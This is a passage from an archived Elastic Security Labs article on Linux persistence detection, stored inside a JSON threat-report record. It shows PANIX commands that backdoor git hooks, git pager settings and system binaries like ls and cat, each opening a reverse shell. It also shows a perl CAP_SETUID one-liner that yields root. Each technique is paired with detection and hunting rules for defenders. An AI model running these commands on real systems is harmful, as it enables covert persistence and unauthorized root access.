discussed\r\nin this section.\r\nPersistence through T1546 - Git\r\nTo test these techniques, the system requires a cloned Git repository. There is no point in setting up a custom\r\nrepository, as the persistence mechanism depends on user actions, making a hidden and unused Git repository an\r\nillogical construct. You could initialize your own hidden repository and chain it together with a\r\ncron / systemd / udev persistence mechanism to initialize the repository on set intervals, but that is out of scope\r\nfor now.\r\nTo test the Git Hook technique, ensure a Git repository is available on the system, and run:\r\n\u003e ./panix.sh --git --default --ip 192.168.1.1 --port 2014 --hook\r\n\u003e [+] Created malicious pre-commit hook in /home/ruben/panix\r\nThe program loops through the entire filesystem (as far as this is possible, based on permissions), finds all of the\r\nrepositories, and backdoors them. To trigger the backdoor, run git add -A and git commit -m \"backdoored!\" .\r\nThis will generate the following events:\r\nEvents generated as a result of the Git Hook persistence establishment\r\nhttps://www.elastic.co/security-labs/sequel-on-persistence-mechanisms\r\nPage 19 of 25\n\nIn this figure we see PANIX looking for Git repositories, adding a pre-commit hook and granting it execution\r\npermissions, successfully planting the backdoor. Next, the backdoor is initiated through the git commit , and the\r\ngit → pre-commit → nohup → setsid → bash reverse shell connection is initiated.\r\nTo test the Git pager technique, ensure a Git repository is available on the system and run:\r\n\u003e ./panix.sh --git --default --ip 192.168.1.1 --port 2015 --pager\r\n\u003e [+] Updated existing Git config with malicious pager in /home/ruben/panix\r\n\u003e [+] Updated existing global Git config with malicious pager\r\nTo trigger the payload, move into the backdoored repository and run a command such as git log . This will\r\ntrigger the following events:\r\nEvents generated as a result of the Git Pager persistence establishment\r\nPANIX executes and starts searching for Git repositories. Once found, the configuration files are updated or\r\ncreated, and the backdoor is planted. Invoking the Git Pager ( less ) executes the backdoor, setting up the git\r\n→ sh → nohup → setsid → bash reverse connection chain.\r\nWe have several layers of detection, covering the Git Hook/Pager persistence techniques.\r\nHunting for persistence through T1546 - Git\r\nHunting for Git Hook/Pager persistence can be conducted through ES|QL and OSQuery. Potential indicators\r\ninclude file creations in the .git/hook/ directories, Git Hook executions, and the modification/creation of Git\r\nconfiguration files. The Git Hook/Pager Persistence hunting rule has several ES|QL and OSQuery queries that will\r\naid in detecting this technique.\r\nhttps://www.elastic.co/security-labs/sequel-on-persistence-mechanisms\r\nPage 20 of 25\n\nT1548 - abuse elevation control mechanism: process capabilities\r\nProcess capabilities are a fine-grained access control mechanism that allows the division of the root user's\r\nprivileges into distinct units. These capabilities can be independently enabled or disabled for processes, and are\r\nused to enhance security by limiting the privileges of processes. Instead of granting a process full root privileges,\r\nonly the necessary capabilities are assigned, reducing the risk of exploitation. This approach follows the principle\r\nof least privilege.\r\nTo better understand them, some use cases for process capabilities are e.g. assigning CAP_NET_BIND_SERVICE to a\r\nweb server that needs to bind to port 80, assigning CAP_NET_RAW to tools that need access to network interfaces or\r\nassigning CAP_DAC_OVERRIDE to backup software requiring access to all files. By leveraging these capabilities,\r\nprocesses are capable of performing tasks that are usually only possible with root access.\r\nWhile process capabilities were developed to enhance security, once root privileges are acquired, attackers can\r\nabuse them to maintain persistence on a compromised system. By setting specific capabilities on binaries or\r\nscripts, attackers can ensure their malicious processes can operate with elevated privileges and allow for an easy\r\nway back to root access in case of losing it. Additionally, misconfigurations may allow attackers to escalate\r\nprivileges.\r\nSome process capabilities can be (ab)used to establish persistence, escalate privileges, access sensitive data, or\r\nconduct other tasks. Process capabilities that can do this include, but are not limited to:\r\nCAP_SYS_MODULE (allows loading/unloading of kernel modules)\r\nCAP_SYS_PTRACE (enables tracing and manipulation of other processes)\r\nCAP_DAC_OVERRIDE (bypasses read/write/execute checks)\r\nCAP_DAC_READ_SEARCH (grants read access to any file on the system)\r\nCAP_SETUID / CAP_SETGID (manipulate UID/GID)\r\nCAP_SYS_ADMIN (to be honest, this just means root access)\r\nA simple way of establishing persistence is to grant the process CAP_SETUID or CAP_SETGID capabilities (this is\r\nsimilar to setting the SUID / SGID bit to a process, which we discussed in the previous persistence blog). But all\r\nof the ones above can be used, be a bit creative here! MITRE does not have a technique dedicated to process\r\ncapabilities. Similar to Setuid/Setgid, this technique can be leveraged for both privilege escalation and persistence.\r\nThe most logical technique to add this mechanism to (based on the existing structure of the MITRE ATT\u0026CK\r\nframework) would be T1548.\r\nPersistence through T1548 - process capabilities\r\nLet’s leverage PANIX to set up a process with CAP_SETUID process capabilities by running:\r\n\u003e sudo ./panix.sh --cap --default\r\n[+] Capability setuid granted to /usr/bin/perl\r\n[-] ruby, is not present on the system.\r\n[-] php is not present on the system.\r\n[-] python is not present on the system.\r\nhttps://www.elastic.co/security-labs/sequel-on-persistence-mechanisms\r\nPage 21 of 25\n\n[-] python3, is not present on the system.\r\n[-] node is not present on the system.\r\nPANIX will by-default check for a list of processes that are easily exploitable after granting CAP_SETUID\r\ncapabilities. You can use --custom and specify --capability and --binary to test some of your own.\r\nIf your system has Perl , you can take a look at GTFOBins to find how to escalate privileges with this capability\r\nset.\r\n/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec \"/bin/sh\";'\r\n# whoami\r\nroot\r\nLooking at the logs in Discover, we can see the following happening:\r\nEvents generated as a result of the Linux capability persistence establishment\r\nWe can see PANIX being executed with uid=0 (root), which grants cap_setuid+ep (effective and permitted) to\r\n/usr/bin/perl . Effective indicates that the capability is currently active for the process, while permitted\r\nindicates that the capability is allowed to be used by the process. Note that all events with uid=0 have all\r\neffective/permitted capabilities set. After granting this capability and dropping down to user permissions, perl is\r\nexecuted and manipulates its own process UID to obtain root access. Feel free to try out different\r\nbinaries/permissions.\r\nAs we have quite an extensive list of rules related to process capabilities (for discovery, persistence and privilege\r\nescalation activity), we will not list all of them here. Instead, you can take a look at this blog post, digging deeper\r\ninto this topic.\r\nHunting for persistence through T1548 - process capabilities\r\nHunting for process capability persistence can be done through ES|QL. We can either do a general hunt and find\r\nnon uid 0 binaries with capabilities set, or hunt for specific potentially dangerous capabilities. To do so, we created\r\nthe Process Capability Hunting rule.\r\nT1554 - compromise host software binary: hijacking system binaries\r\nhttps://www.elastic.co/security-labs/sequel-on-persistence-mechanisms\r\nPage 22 of 25\n\nAfter gaining access to a system and, if necessary, escalating privileges to root access, system binary\r\nhijacking/wrapping is another option to establish persistence. This method relies on the trust and frequent\r\nexecution of system binaries by a user.\r\nSystem binaries, located in directories like /bin , /sbin , /usr/bin , and /usr/sbin are commonly used by\r\nusers/administrators to perform basic tasks. Attackers can hijack these system binaries by replacing or\r\nbackdooring them with malicious counterparts. System binaries that are used often such as cat , ls , cp , mv ,\r\nless or sudo are perfect candidates, as this mechanism relies on the user executing the binary.\r\nThere are multiple ways to establish persistence through this method. The attacker may manipulate the system’s\r\n$PATH environment variable to prioritize a malicious binary over the regular system binary. Another method\r\nwould be to replace the real system binary, executing arbitrary malicious code on launch, after which the regular\r\ncommand is executed.\r\nAttackers can be creative in leveraging this technique, as any code can be executed. For example, the system-wide\r\nsudo / su binaries can be backdoored to capture a password every time a user attempts to run a command with\r\nsudo . Another method can be to establish a reverse connection every time a binary is executed or a backdoor\r\nbinary is called on each binary execution. As long as the attacker hides well and no errors are presented to the\r\nuser, this technique is difficult to detect. MITRE does not have a direct reference to this technique, but it probably\r\nfits T1554 best.\r\nLet’s take a look at what hijacking system binaries might look like.\r\nPersistence through T1554 - hijacking system binaries\r\nThe implementation of system binary hijacking in PANIX leverages the wrapping of a system binary to establish a\r\nreverse connection to a specified IP. You can reference this example or set it up by executing:\r\n\u003e sudo ./panix.sh --system-binary --default --ip 192.168.1.1 --port 2016\r\n\u003e [+] cat backdoored successfully.\r\n\u003e [+] ls backdoored successfully.\r\nNow, execute ls or cat to establish persistence. Let’s analyze the logs.\r\nhttps://www.elastic.co/security-labs/sequel-on-persistence-mechanisms\r\nPage 23 of 25\n\nEvents generated as a result of the Linux system binary hijacking persistence establishment\r\nIn the figure above we see PANIX executing, moving /usr/bin/ls to /usr/bin/ls.original . It then\r\nbackdoors /usr/bin/ls to execute arbitrary code, after which it calls /usr/bin/ls.original in order to trick\r\nthe user. Afterwards, we see bash setting up the reverse connection. The copying/renaming of system binaries\r\nand the hijacking of the sudo binary are captured in the following detection rules.\r\nHunting for persistence through T1554 - hijacking system binaries\r\nThis activity should be very uncommon, and therefore the detection rules above can be leveraged for hunting.\r\nAnother way of hunting for this activity could be assembling a list of uncommon binaries to spawn child\r\nprocesses. To aid in this process we created the Unusual System Binary Parent (Potential System Binary Hijacking\r\nAttempt) hunting rule.\r\nConclusion\r\nIn this part of our “Linux Detection Engineering” series, we explored more advanced Linux persistence techniques\r\nand detection strategies, including init systems, run control scripts, message of the day, udev (rules), package\r\nmanagers, Git, process capabilities, and system binary hijacking. If you missed the previous part on persistence,\r\ncatch up here.\r\nWe did not only explain each technique but also demonstrated how to implement them using PANIX. This hands-on approach allowed you to assess detection capabilities in your own security setup. Our discussion included\r\ndetection and endpoint rule coverage and referenced effective hunting strategies, from ES|QL aggregation queries\r\nto live OSQuery hunts.\r\nWe hope you've found this format informative. Stay tuned for more insights into Linux detection engineering.\r\nHappy hunting!\r\nhttps://www.elastic.co/security-labs/sequel-on-persistence-mechanisms\r\nPage 24 of 25\n\nSource: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms\r\nhttps://www.elastic.co/security-labs/sequel-on-persistence-mechanisms\r\nPage 25 of 25",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms"
	],
	"report_names": [
		"sequel-on-persistence-mechanisms"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434462,
	"ts_updated_at": 1775791458,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ac5e1ae9222a705f18b7ba216fa2fad095e0a9e6.pdf",
		"text": "https://archive.orkl.eu/ac5e1ae9222a705f18b7ba216fa2fad095e0a9e6.txt",
		"img": "https://archive.orkl.eu/ac5e1ae9222a705f18b7ba216fa2fad095e0a9e6.jpg"
	}
}